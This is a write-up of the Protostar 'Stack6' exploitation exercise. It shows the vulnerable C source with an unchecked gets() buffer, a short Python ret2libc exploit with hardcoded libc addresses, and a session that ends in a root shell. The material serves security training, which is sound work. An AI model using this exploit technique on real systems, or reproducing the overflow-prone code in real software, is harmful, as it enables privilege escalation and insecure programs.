stack6
Stack6
URL: https://exploit.education/protostar/stack-six/
Stack6 looks at what happens when you have restrictions on the return address.
This level can be done in a couple of ways, such as finding the duplicate of the payload ( objdump -s will help with this), or ret2libc , or even return orientated programming.
It is strongly suggested you experiment with multiple ways of getting your code to execute here.
This level is at /opt/protostar/bin/stack6
Source code
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
void getpath()
{
char buffer[64];
unsigned int ret;
printf("input path please: "); fflush(stdout);
gets(buffer);
ret = __builtin_return_address(0);
if((ret & 0xbf000000) == 0xbf000000) {
printf("bzzzt (%p)\n", ret);
_exit(1);
}
printf("got path %s\n", buffer);
}
int main(int argc, char **argv)
{
getpath();
}
Writeup
Here we have to change the return address in order to get the shell
Steps to follow:
get the padding using offset method
get the system address using
p system
in GDBreturn to address of 41414141
get the
/bin/sh
address from libc lib
Exploit code
import struct
padding = "0000AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPQQQQPRRRRSSSS"
system = struct.pack("I", 0xb7ecffb0)
ret = "AAAA"
shell = struct.pack("I", 0xb7fb63bf)
print padding + system + ret + shell
Solution:
user@protostar:/tmp$ (python exploit.py; cat) | /opt/protostar/bin/stack6
input path please: got path 0000AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO▒▒▒QQQPRRRRSSSS▒▒▒AAAA▒c▒
id
uid=1001(user) gid=1001(user) euid=0(root) groups=0(root),1001(user)
whoami
root
Last updated